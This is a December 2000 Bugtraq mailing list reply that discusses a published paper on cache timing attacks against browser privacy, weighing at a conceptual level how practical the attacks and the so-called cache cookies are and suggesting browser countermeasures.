Bugtraq mailing list archives

Re: cache cookies?


From: Robert Bihlmeyer <robbe () ORCUS PRIV AT>
Date: Thu, 14 Dec 2000 01:15:08 +0100

cypherstar <cypherstuff () vrl com au> writes:

Has this been sighted already?

IIRC this has not appeared on Bugtraq. Interesting pointer!

or is it snakeoil?

http://www.princeton.edu/pr/news/00/q4/1205-browser.htm

IMO quite plausible, although I'm not convinced whether it will work that
good in practice - for more comments see below.

More details than the press-release are in "Timing Attacks on Web
Privacy. Edward W. Felten and Michael A. Schneider. Proc. of 7th ACM
Conference on Computer and Communications Security, Nov. 2000."
<URL:http://www.acm.org/pubs/articles/proceedings/commsec/352600/p25-felten/p25-felten.pdf>
(8 pages/83 kB)

Abstract from the paper:

| We describe a class of attacks that can compromise the privacy of
| users' Web-browsing histories. The attacks allow a malicious Web
| site to determine whether or not the user has recently visited some
| other, unrelated Web page. The malicious page can determine this
| information by measuring the time the user's browser requires to
| perform certain operations. Since browsers perform various forms of
| caching, the time required for operations depends on the user's
| browsing history; this paper shows that the resulting time
| variations convey enough information to compromise users' privacy.
| This attack method also allows other types of information gathering
| by Web sites, such as a more invasive form of Web "cookies". The
| attacks we describe can be carried out without the victim's
| knowledge, and most "anonymous browsing" tools fail to prevent them.
| Other simple countermeasures also fail to prevent these attacks. We
| describe a way of reengineering browsers to prevent most of them.

My comments:

The attack's goal is to determine whether an URL U is cached or not.
(The method is probabilistic and may guess wrong, error rates should
be below 10 % in common settings[1].) The authors suggest two
applications of this kind of knowledge: (a) it's valuable to be aware
if a visitor has visited certain other sites (think: competitors)
recently, and (b) to save persistent state akin to cookies without the
user noticing.

They offer some cures (like disabling caching), and state that those
are not good. True, all the straight-forward solutions are as bad as
the problem. But this does not mean better remedies do not exist!

First, I would very much like to know how Felten and Schneider
accomplish the timing of URL loading in practice. They mention Java
and JavaScript as the best method. This is of course easily prevented
by turning those off. I don't think many persons concerned about
privacy have them turned on except for special sites. But even without
J/JS, they say, it is possible to instruct the browser to fetch URLs
*one after another*[2]

Offhand, I can't think of a trick to accomplish that, as usually
browsers will fetch multiple resources in parallel. There certainly is
specific HTML-code that persuades the popular browsers get those URLs
in a series (I'd still like to see that code, though). But unless the
order is determined by adherence to a some web-standard, browsers
could still change it at will. At the moment, sub-resources (embedded
IMGs, etc.) are probably fetched deterministically first-to-last.
These could as well be downloaded in random order. Unless there is a
secret I'm overlooking this would thwart two thirds of the
measurements.

To the applications: I doubt that (a) will see much use. One can only
check against a few URLs, and even single requests will certainly
raise somebody's suspicion. That's bad PR waiting to happen, with the
overall benefits being quite dubious. Hell, if (their example) you use
your competitor's logo for those checks, I'm sure a moderately good
lawyer could give your company some painful copyright/trademark/etc.
headaches. You're not up against some paranoid users here, you're up
against a competitor that is threatening enough that you feel the need
to spy on him!

(b) is more plausible. I can't reproduce their assessment, though,
that traditional cookies store few enough bits, so that mapping them
onto "cache cookies" is feasable. The most common use for cookies (or
at least the use that most people object to) is to store unique
identifiers for visitors. Even a small web-shop needs more than 10
bits for that - a quick perusal of the cookies offered by major
websites suggests that they use visitor ids in the range of 32 bits
and beyond.

I can imagine a site pulling this off with, say, 15 URLs without
raising much suspicion. But 30 or 40? You either have to tag this
stuff to the end of your page, which makes it very fishy; or try to
hide it in your layout (perhaps all those transparent space.gifs are
now called 0.gif, 1.gif, _0.gif, _1.gif, etc.), which is still
somewhat fishy /and/ increases the time until your layout
finalizes[3].

All in all, this is interesting food for thought. Developers of future
browser versions should definitely be aware of this issue.


Footnotes:
[1] These rates are not really bad. Marketing is not rocket science,
and can live with even worse results.

[2] The J/JS-less method depends on that. In effect you get URLs A then
U and then B, where U is the one you want to measure, and A, and B are
reference URLs on your site. The timespan between the access times
measured by your server for A and B approximates the load time of U.

[3] Remember that about half of the URLs fetched while reading a
cookie will not come from the cache, and that they MUST be fetched one
after another. So we have 15-20 (presumably small) resources that will
take about one round-trip in latency each. That's certainly around a
second, perhaps more like two or three.

--
Robbe

Attachment: signature.ng
Description:


Current thread: